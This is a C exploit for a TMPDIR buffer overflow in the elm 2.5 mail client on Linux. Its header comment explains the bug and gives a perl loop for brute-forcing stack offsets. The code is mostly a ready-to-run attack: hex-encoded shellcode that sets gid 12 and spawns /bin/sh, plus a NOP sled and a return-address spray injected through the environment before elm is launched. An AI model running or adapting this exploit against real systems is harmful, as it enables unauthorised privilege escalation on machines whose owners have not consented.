/* (linux)elm[2.5] buffer overflow, by v9[v9@fakehalo.org].  this will give you
   a gid=12 shell if /usr/bin/elm is SGID(=2755).  elm rejects most user
   defined vars after 254<characters but TMPDIR overflows a few characters
   before that in some situations.  both elm 2.4 and 2.5(current) have this
   overflow, but elm 2.4's can be handled differently. (elm_bof24.c)

   note: try offsets of 100, as noted in the perl script below.  1300 worked on
   my old slackware 3.6, (elm 2.5 PL3).  i compiled and installed it from the
   latest version i could find.  it is possible you may need to modify this to 
   your system. (probably not though) -- tested on elm 2.5 PL1-3. (redhat)

   yeah, i obviously was looking around the elm source to find this.  too much
   free time for me.  although, i also noticed that just typing too much in elm
   will make it segfault. :)     

   here is a quick perl script to run offsets (until ctrl-c):

   #!/usr/bin/perl
   $i=$ARGV[0];
   while(1){
    print "offset: $i.\n";
    system("rm /tmp/mbox.\$USER;./elm_bof25 $i");
    $i++; # or $i+=100; if you want to be speedy. (which you do)
   } */

#define DEFAULT_OFFSET 1300
static char exec[]=
 "\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3\x0c\xcd\x80\x89\x76\x08\x31\xc0\x88"
 "\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
 "\x89\xd8\x40\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01";
long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
 char bof[254];
 int i,offset;
 long ret;
 if(argc>1){offset=atoi(argv[1]);}
 else{offset=DEFAULT_OFFSET;}
 ret=(esp()-offset);
 printf("return address: 0x%lx, offset: %d.\n\nwhen ELM loads press \"m\" to send mail, then enter\ngarbage values until you get to the message editor(vi).\nyou also might want to run \"reset\".\n",ret,offset);
 sleep(5);
 for(i=3;i<254;i+=4){*(long *)&bof[i]=ret;}
 for(i=0;i<(200-strlen(exec));i++){*(bof+i)=0x90;}
 memcpy(bof+i,exec,strlen(exec));
 setenv("TMPDIR",bof,1);
 execlp("/usr/bin/elm","elm",0);
}